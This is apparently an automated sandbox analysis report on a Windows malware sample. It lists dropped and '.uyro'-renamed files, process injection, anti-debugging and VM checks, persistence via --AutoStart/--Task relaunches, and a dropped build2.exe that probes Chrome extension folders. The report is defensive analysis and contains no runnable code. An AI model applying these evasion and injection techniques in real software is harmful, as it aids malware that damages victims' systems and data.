Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\FileCoAuth.exe	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\xh-ZA\FileSync.LocalizedResources.dll.mui	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\sk\FileSync.LocalizedResources.dll.mui	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\fil-PH\FileSync.LocalizedResources.dll.mui	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\it\FileSync.LocalizedResources.dll.mui	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\tt\FileSync.LocalizedResources.dll.mui	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Dropped PE file which has not been started: C:\Users\user\Local Settings\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\en-US\LogProvider.dll.mui.uyro (copy)	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\tn-ZA\FileSync.LocalizedResources.dll.mui	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\th\FileSync.LocalizedResources.dll.mui	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CR_4BAC1.tmp\setup.exe	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\rw\FileSync.LocalizedResources.dll.mui	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\en-US\DismProv.dll.mui	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\ga-IE\FileSync.LocalizedResources.dll.mui	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\el\FileSync.LocalizedResources.dll.mui	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Dropped PE file which has not been started: C:\Users\user\Local Settings\Microsoft\OneDrive\19.086.0502.0006\FileSyncConfig.exe.uyro (copy)	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\kk\FileSync.LocalizedResources.dll.mui	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\ig-NG\FileSync.LocalizedResources.dll.mui	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\or-IN\FileSync.LocalizedResources.dll.mui	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\zu-ZA\FileSync.LocalizedResources.dll.mui	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\wo\FileSync.LocalizedResources.dll.mui	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\da\FileSync.LocalizedResources.dll.mui	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\as-IN\FileSync.LocalizedResources.dll.mui	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\81bc8e9b-9d47-41ad-b82b-bbc3ff54a6de\build3.exe	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\en-US\AssocProvider.dll.mui	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\ar\FileSync.LocalizedResources.dll.mui	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\ur\FileSync.LocalizedResources.dll.mui	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\ku-Arab\FileSync.LocalizedResources.dll.mui	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\en-US\UnattendProvider.dll.mui	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Dropped PE file which has not been started: C:\Users\user\Local Settings\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\en-US\FfuProvider.dll.mui.uyro (copy)	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\uz-Latn-UZ\FileSync.LocalizedResources.dll.mui	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\hi\FileSync.LocalizedResources.dll.mui	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\ko\FileSync.LocalizedResources.dll.mui	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Dropped PE file which has not been started: C:\Users\user\Local Settings\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\en-US\GenericProvider.dll.mui.uyro (copy)	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\bn-IN\FileSync.LocalizedResources.dll.mui	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Dropped PE file which has not been started: C:\Users\user\Local Settings\Microsoft\OneDrive\19.086.0502.0006\OneDriveUpdaterService.exe.uyro (copy)	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\zh-TW\FileSync.LocalizedResources.dll.mui	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\en-US\IntlProvider.dll.mui	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\es\FileSync.LocalizedResources.dll.mui	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Dropped PE file which has not been started: C:\Users\user\Local Settings\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\en-US\AppxProvider.dll.mui.uyro (copy)	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\en-US\FfuProvider.dll.mui	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Dropped PE file which has not been started: C:\Users\user\Local Settings\Microsoft\OneDrive\19.086.0502.0006\OneDriveSetup.exe.uyro (copy)	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Dropped PE file which has not been started: C:\Users\user\Local Settings\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\DismHost.exe.uyro (copy)	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\bg\FileSync.LocalizedResources.dll.mui	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\hu\FileSync.LocalizedResources.dll.mui	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\ug\FileSync.LocalizedResources.dll.mui	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\et\FileSync.LocalizedResources.dll.mui	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\OneDrive.exe	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\prs-AF\FileSync.LocalizedResources.dll.mui	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\pa-Arab-PK\FileSync.LocalizedResources.dll.mui	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\lv\FileSync.LocalizedResources.dll.mui	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\gu\FileSync.LocalizedResources.dll.mui	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\af\FileSync.LocalizedResources.dll.mui	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\fa\FileSync.LocalizedResources.dll.mui	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\cs\FileSync.LocalizedResources.dll.mui	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\en-GB\FileSync.LocalizedResources.dll.mui	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Dropped PE file which has not been started: C:\Users\user\Local Settings\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\en-US\DmiProvider.dll.mui.uyro (copy)	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\yo-NG\FileSync.LocalizedResources.dll.mui	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\sr-Cyrl-RS\FileSync.LocalizedResources.dll.mui	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\en-US\GenericProvider.dll.mui	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\si-LK\FileSync.LocalizedResources.dll.mui	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Dropped PE file which has not been started: C:\Users\user\Local Settings\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\en-US\CompatProvider.dll.mui.uyro (copy)	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\F0AA5307-87B6-41CC-8AB9-9D4E70F644BD\en-US\WimProvider.dll.mui	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\ha-Latn-NG\FileSync.LocalizedResources.dll.mui	Jump to dropped file
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\sr-Cyrl-BA\FileSync.LocalizedResources.dll.mui	Jump to dropped file

Source: C:\Users\user\Desktop\U59WtZz2Sg.exe

Code function: 0_2_0218C71C rdtsc

0_2_0218C71C

Source: C:\Users\user\AppData\Local\81bc8e9b-9d47-41ad-b82b-bbc3ff54a6de\build2.exe

Registry key enumerated: More than 150 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall

Source: C:\Users\user\Desktop\U59WtZz2Sg.exe

Evaded block: after key decision

graph_0-6323

Source: C:\Users\user\Desktop\U59WtZz2Sg.exe

Code function: _malloc,_malloc,_wprintf,_free,GetAdaptersInfo,_free,_malloc,GetAdaptersInfo,_sprintf,_wprintf,_wprintf,_free,

1_2_0040E670

Source: C:\Users\user\Desktop\U59WtZz2Sg.exe

Thread delayed: delay time: 700000

Jump to behavior

Source: C:\Users\user\Desktop\U59WtZz2Sg.exe

0_2_00403341

Source: C:\Users\user\Desktop\U59WtZz2Sg.exe

API call chain: ExitProcess graph end node

graph_1-34892

Source: C:\Users\user\AppData\Local\81bc8e9b-9d47-41ad-b82b-bbc3ff54a6de\build2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\html\
Source: C:\Users\user\AppData\Local\81bc8e9b-9d47-41ad-b82b-bbc3ff54a6de\build2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\
Source: C:\Users\user\AppData\Local\81bc8e9b-9d47-41ad-b82b-bbc3ff54a6de\build2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\
Source: C:\Users\user\AppData\Local\81bc8e9b-9d47-41ad-b82b-bbc3ff54a6de\build2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\bg\
Source: C:\Users\user\AppData\Local\81bc8e9b-9d47-41ad-b82b-bbc3ff54a6de\build2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\css\
Source: C:\Users\user\AppData\Local\81bc8e9b-9d47-41ad-b82b-bbc3ff54a6de\build2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\images\

Source: U59WtZz2Sg.exe, 00000005.00000003.442737523.0000000003060000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: "VMware7,1
Source: U59WtZz2Sg.exe, 00000001.00000002.309333015.0000000000827000.00000004.00000020.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000001.00000002.309384223.000000000087D000.00000004.00000020.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.385404722.00000000008AD000.00000004.00000020.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000002.574964169.00000000008AD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: U59WtZz2Sg.exe, 00000001.00000002.309333015.0000000000827000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: U59WtZz2Sg.exe, 00000001.00000002.309333015.0000000000827000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Z

Source: C:\Users\user\Desktop\U59WtZz2Sg.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Code function: 1_2_00410160 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,FindNextFileW,FindClose,		1_2_00410160
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Code function: 1_2_0040F730 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,_wcsstr,_wcsstr,FindNextFileW,FindClose,		1_2_0040F730

Source: C:\Users\user\Desktop\U59WtZz2Sg.exe

Code function: 0_2_0040322F LoadLibraryA,GetProcAddress,VirtualProtect,

0_2_0040322F

Source: C:\Users\user\Desktop\U59WtZz2Sg.exe

Code function: 0_2_0218B0A3 push dword ptr fs:[00000030h]

0_2_0218B0A3

Source: C:\Users\user\AppData\Local\81bc8e9b-9d47-41ad-b82b-bbc3ff54a6de\build2.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\81bc8e9b-9d47-41ad-b82b-bbc3ff54a6de\build2.exe	Process queried: DebugPort

Source: C:\Users\user\Desktop\U59WtZz2Sg.exe

Code function: 0_2_00405D0D _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

0_2_00405D0D

Source: C:\Users\user\Desktop\U59WtZz2Sg.exe

Code function: 1_2_0042A57A EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,

1_2_0042A57A

Source: C:\Users\user\Desktop\U59WtZz2Sg.exe

Code function: 1_2_00447CAC __lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock,

1_2_00447CAC

Source: C:\Users\user\Desktop\U59WtZz2Sg.exe

Code function: 0_2_0218C71C rdtsc

0_2_0218C71C

Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Code function: 0_2_0040485B __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_0040485B
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Code function: 0_2_0040A05B SetUnhandledExceptionFilter,	0_2_0040A05B
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Code function: 0_2_00405D0D _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_00405D0D
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Code function: 0_2_004081E1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_004081E1
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Code function: 1_2_004329EC SetUnhandledExceptionFilter,UnhandledExceptionFilter,	1_2_004329EC
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Code function: 1_2_004329BB SetUnhandledExceptionFilter,	1_2_004329BB

HIPS / PFW / Operating System Protection Evasion

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Memory written: C:\Users\user\Desktop\U59WtZz2Sg.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Memory written: C:\Users\user\Desktop\U59WtZz2Sg.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Local\439dd104-1941-4ae6-af5f-8afc23993f7a\U59WtZz2Sg.exe	Memory written: C:\Users\user\AppData\Local\439dd104-1941-4ae6-af5f-8afc23993f7a\U59WtZz2Sg.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Local\439dd104-1941-4ae6-af5f-8afc23993f7a\U59WtZz2Sg.exe	Memory written: C:\Users\user\AppData\Local\439dd104-1941-4ae6-af5f-8afc23993f7a\U59WtZz2Sg.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Local\81bc8e9b-9d47-41ad-b82b-bbc3ff54a6de\build2.exe	Memory written: C:\Users\user\AppData\Local\81bc8e9b-9d47-41ad-b82b-bbc3ff54a6de\build2.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\439dd104-1941-4ae6-af5f-8afc23993f7a\U59WtZz2Sg.exe	Memory written: C:\Users\user\AppData\Local\439dd104-1941-4ae6-af5f-8afc23993f7a\U59WtZz2Sg.exe base: 400000 value starts with: 4D5A

Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Process created: C:\Users\user\Desktop\U59WtZz2Sg.exe C:\Users\user\Desktop\U59WtZz2Sg.exe	Jump to behavior
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Process created: C:\Users\user\Desktop\U59WtZz2Sg.exe "C:\Users\user\Desktop\U59WtZz2Sg.exe" --Admin IsNotAutoStart IsNotTask	Jump to behavior
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Process created: C:\Users\user\Desktop\U59WtZz2Sg.exe "C:\Users\user\Desktop\U59WtZz2Sg.exe" --Admin IsNotAutoStart IsNotTask	Jump to behavior
Source: C:\Users\user\AppData\Local\439dd104-1941-4ae6-af5f-8afc23993f7a\U59WtZz2Sg.exe	Process created: C:\Users\user\AppData\Local\439dd104-1941-4ae6-af5f-8afc23993f7a\U59WtZz2Sg.exe C:\Users\user\AppData\Local\439dd104-1941-4ae6-af5f-8afc23993f7a\U59WtZz2Sg.exe --Task	Jump to behavior
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Process created: C:\Users\user\AppData\Local\81bc8e9b-9d47-41ad-b82b-bbc3ff54a6de\build2.exe "C:\Users\user\AppData\Local\81bc8e9b-9d47-41ad-b82b-bbc3ff54a6de\build2.exe"	Jump to behavior
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Process created: C:\Users\user\AppData\Local\81bc8e9b-9d47-41ad-b82b-bbc3ff54a6de\build3.exe "C:\Users\user\AppData\Local\81bc8e9b-9d47-41ad-b82b-bbc3ff54a6de\build3.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\439dd104-1941-4ae6-af5f-8afc23993f7a\U59WtZz2Sg.exe	Process created: C:\Users\user\AppData\Local\439dd104-1941-4ae6-af5f-8afc23993f7a\U59WtZz2Sg.exe "C:\Users\user\AppData\Local\439dd104-1941-4ae6-af5f-8afc23993f7a\U59WtZz2Sg.exe" --AutoStart	Jump to behavior
Source: C:\Users\user\AppData\Local\81bc8e9b-9d47-41ad-b82b-bbc3ff54a6de\build2.exe	Process created: C:\Users\user\AppData\Local\81bc8e9b-9d47-41ad-b82b-bbc3ff54a6de\build2.exe "C:\Users\user\AppData\Local\81bc8e9b-9d47-41ad-b82b-bbc3ff54a6de\build2.exe"
Source: C:\Users\user\AppData\Local\439dd104-1941-4ae6-af5f-8afc23993f7a\U59WtZz2Sg.exe	Process created: C:\Users\user\AppData\Local\439dd104-1941-4ae6-af5f-8afc23993f7a\U59WtZz2Sg.exe "C:\Users\user\AppData\Local\439dd104-1941-4ae6-af5f-8afc23993f7a\U59WtZz2Sg.exe" --AutoStart

Source: C:\Users\user\Desktop\U59WtZz2Sg.exe

Code function: 1_2_00419F90 GetCurrentProcess,GetLastError,GetLastError,SetPriorityClass,GetLastError,GetModuleFileNameW,PathRemoveFileSpecW,GetCommandLineW,CommandLineToArgvW,lstrcpyW,lstrcmpW,lstrcmpW,lstrcpyW,lstrcpyW,lstrcmpW,lstrcmpW,GlobalFree,lstrcpyW,lstrcpyW,OpenProcess,WaitForSingleObject,CloseHandle,Sleep,GlobalFree,GetCurrentProcess,GetExitCodeProcess,TerminateProcess,CloseHandle,lstrcatW,GetVersion,lstrcpyW,lstrcatW,lstrcatW,_memset,ShellExecuteExW,CreateThread,lstrlenA,lstrcatW,_malloc,lstrcatW,_memset,lstrcatW,MultiByteToWideChar,lstrcatW,lstrlenW,CreateThread,WaitForSingleObject,CreateMutexA,CreateMutexA,lstrlenA,lstrcpyA,_memmove,_memmove,_memmove,GetUserNameW,GetMessageW,GetMessageW,DispatchMessageW,TranslateMessage,TranslateMessage,DispatchMessageW,GetMessageW,PostThreadMessageW,PeekMessageW,PostThreadMessageW,PeekMessageW,DispatchMessageW,PeekMessageW,WaitForSingleObject,PostThreadMessageW,PeekMessageW,DispatchMessageW,PeekMessageW,WaitForSingleObject,CloseHandle,

1_2_00419F90

Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Code function: GetLocaleInfoA,	0_2_0040D8D8
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Code function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtLCMapStringA,___crtLCMapStringA,___crtGetStringTypeA,_free,_free,_free,_free,_free,_free,_free,_free,_free,	1_2_0043404A
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Code function: _LcidFromHexString,GetLocaleInfoW,_TestDefaultLanguage,	1_2_00438178
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,	1_2_00440116
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Code function: _wcscmp,_wcscmp,GetLocaleInfoW,GetLocaleInfoW,GetACP,	1_2_004382A2
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Code function: GetLocaleInfoW,_GetPrimaryLen,	1_2_0043834F
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Code function: _memset,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_GetLcidFromCountry,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,___crtDownlevelLCIDToLocaleName,___crtDownlevelLCIDToLocaleName,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,__itow_s,	1_2_00438423
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe	Code function: 